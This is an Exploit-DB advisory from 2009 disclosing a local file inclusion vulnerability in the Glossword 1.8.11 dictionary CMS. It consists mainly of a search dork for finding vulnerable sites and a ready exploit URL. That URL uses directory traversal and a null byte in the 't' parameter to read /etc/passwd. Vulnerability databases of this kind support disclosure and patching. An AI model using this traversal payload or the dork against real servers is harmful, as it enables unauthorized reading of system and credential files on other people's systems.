Glossword <= 1.8.11 index.php x Local File Inclusion Vulnerability

2009-06-24T00:00:00
ID EDB-ID:9010
Type exploitdb
Reporter t0fx
Modified 2009-06-24T00:00:00

Description

Glossword <= 1.8.11 (index.php x) Local File Inclusion Vulnerability. Webapps exploit for php platform

                                        
                                            |--&gt;Glossword 1.8.11 LFI
|--&gt;CMS INFORMATION:
|                                                   
|--&gt;WEB: http://code.google.com/p/glossword/                              
|--&gt;DOWNLOAD: http://code.google.com/p/glossword/downloads/list                                  
|--&gt;DESCRIPTION: Glossword is a system written in PHP to create and publish online multilingual dictionary, glossary, or encyclopedia.            
|                                               
|  CMS VULNERABILITY:                                       
|                                               
|--&gt;TESTED ON: firefox 3                                           
|--&gt;DORK: "Powered by Glossword 1.8.11" , "Powered by Glossword 1.8.6" ...                                           
|--&gt;CATEGORY: LOCAL FILE INCLUSION (LFI)               
|--&gt;AFFECT VERSION: all &gt; 1.8.11                           
|--&gt;Author: t0fx                                                                    
|--&gt;GREETZ: europasecurity.org // security-shell.ws // str0ke // elitexbytes // Pig le marabou belge // p3lo // Sh0ck le congolais

|--&gt;Exploit :
| http://www.website.fr/glossword_path/index.php?t=../../../../../../../../../../../../../etc/passwd%00

# milw0rm.com [2009-06-24]